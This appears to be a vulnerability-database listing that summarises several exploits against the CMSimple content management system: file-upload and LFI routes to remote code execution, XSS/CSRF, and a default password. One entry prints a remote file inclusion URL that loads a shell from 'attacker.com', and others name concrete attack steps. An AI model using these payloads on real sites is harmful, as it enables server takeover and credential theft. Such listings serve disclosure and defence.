header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

CMSimple 5.15 – Remote Command Execution

The vulnerability allows an attacker to execute arbitrary commands on the target system by uploading a malicious PHP file. By appending ",php" to the end of the Extensions_userfiles field in the CMS Settings, an attacker can upload a shell.php file via the Media section and access it remotely.

Multiple Cross-Site Scripting and Cross-Site Request Forgery Vulnerabilities in CMSimple

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

Multiple vulnerabilities in CMSimple

An attacker can bypass security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application by exploiting multiple vulnerabilities in CMSimple. The vulnerabilities exist in the file 'required_classes.php' located at 'http://www.example.com/CMSimple/plugins/filebrowser/classes/'. The attacker can use the following exploit code to execute arbitrary PHP code: http://www.example.com/CMSimple/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?. The exploit also affects the following files: CMSimple/2lang/index.php, CMSimple/2site/index.php, CMSimple/cmsimple/cms.php, CMSimple/index.php, CMSimple/plugins/index.php.

CMSimple 5.4 – Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)

CMSimple 5.4 is vulnerable to Local file inclusion (LFI) to Remote code execution (RCE) when an authenticated user is present. An attacker can exploit this vulnerability by changing the functions_file parameter to php://input and sending a malicious payload to the server. This will allow the attacker to execute arbitrary code on the server.

Cmsimple 5.4 – Remote Code Execution (RCE) (Authenticated)

A vulnerability in Cmsimple 5.4 allows an authenticated user to execute arbitrary code on the target system. This is achieved by sending a crafted POST request to the target system with a malicious payload. The payload is then executed on the target system.

CMSimple Multiple Security Vulnerabilities

CMSimple is prone to multiple security vulnerabilities including arbitrary PHP code-execution vulnerabilities, a weak authentication security-bypass vulnerability, and other security vulnerabilities. An attacker can exploit these issues to bypass certain security restrictions, perform unauthorized actions, and execute arbitrary script code in the context of the affected application. This may aid in further attacks. Additionally, any user can login to the CMSimple website with the default password 'test' and no username.

CMSimple Cross-Site Scripting Vulnerability

CMSimple is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Recent Exploits: